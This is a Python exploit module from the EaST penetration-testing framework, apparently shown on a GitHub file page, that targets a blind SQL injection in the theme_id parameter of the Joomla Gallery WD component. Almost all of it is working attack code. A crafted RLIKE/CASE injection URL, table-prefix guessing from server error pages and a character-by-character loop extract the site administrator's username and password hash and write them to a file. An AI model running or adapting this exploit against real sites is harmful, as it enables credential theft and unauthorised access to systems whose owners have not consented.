Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
135 lines (116 sloc) 4.22 KB
#!/usr/bin/env python
# The exploit is a part of EaST pack - use only under the license agreement
# specified in LICENSE.txt in your EaST distribution
import sys
import time
import urllib2
import string
sys.path.append("./core")
from Sploit import Sploit
INFO = {}
INFO['NAME'] = "ef_joomla_gallery_wd_bsqli"
INFO['DESCRIPTION'] = "Joomla Gallery WD - SQL Injection Vulnerability"
INFO['VENDOR'] = "http://web-dorado.com/"
INFO["CVE Name"] = ""
INFO["NOTES"] = """
Joomla Gallery WD is not filtering data in theme parameter theme_id
and hence affected from SQL injection vulnerability.
Tested against Joomla Gallery WD on Windows XP SP3.
"""
INFO['CHANGELOG'] = "11 Sep 2015. Written by Gleg team."
INFO['PATH'] = 'Exploits/'
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = '127.0.0.1'
OPTIONS["PORT"] = 80
OPTIONS["SSL"] = False
OPTIONS["BASEPATH"] = '/'
POOL = string.ascii_letters + string.digits + ':' + '-' + '/' + '$'
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.ssl = False
self.port = port
self.host = host
self.basepath = '/'
self.url = ''
self.table = ''
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.ssl = bool(self.args.get('SSL', self.ssl))
self.basepath = self.args.get('BASEPATH', self.basepath)
self.url = self.make_url('/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28substring%28%28select%20concat%28username,char%2858%29,password%29%20from%20{table}%20order%20by%20registerDate%20desc%20limit%201%29,{pos},1%29=char%28{char}%29%29%20THEN%204%20ELSE%200x28%20END%29%29')
return
def make_url(self, path = ''):
return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)
def prot(self):
return self.ssl and 'https://' or 'http://'
def check(self):
self.args()
self.log( "Testing %s:%d" % ( self.host, self.port ) )
try:
fd = urllib2.urlopen(self.make_url())
except urllib2.URLError, er:
return 0
return 1
def guess_table_name(self):
result = None
try:
urllib2.urlopen(self.url)
except Exception, e:
if e.code == 500:
result = e.read()
try:
result = result.split('* FROM ')[1].split('_bwg_theme')[0]
except:
return result
return result + '_users'
def guess_letter(self, pos):
for c in POOL:
url = self.url.format(pos=pos, char=ord(c), table=self.table)
try:
req = urllib2.urlopen(url)
return c
except Exception as e:
if e.code == 503:
return c
continue
return None
def run(self):
self.args()
self.log('Begin extracting admin\'s credentials')
self.log('This may take about 15 minutes')
self.table = self.guess_table_name()
if not self.table:
self.log('Prefix of tables not found')
self.finish(False)
return 0
self.log('Found table {}'.format(self.table))
i, result = 1, ''
char = self.guess_letter(i)
while char:
i += 1
result += char
self.log('Current result: ' + result)
char = self.guess_letter(i)
if result:
self.log('End with: {}'.format(result))
self.writefile(result)
self.finish(True)
return 1
self.log('Failed')
self.finish(False)
return 0
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit('', 80)
e.run()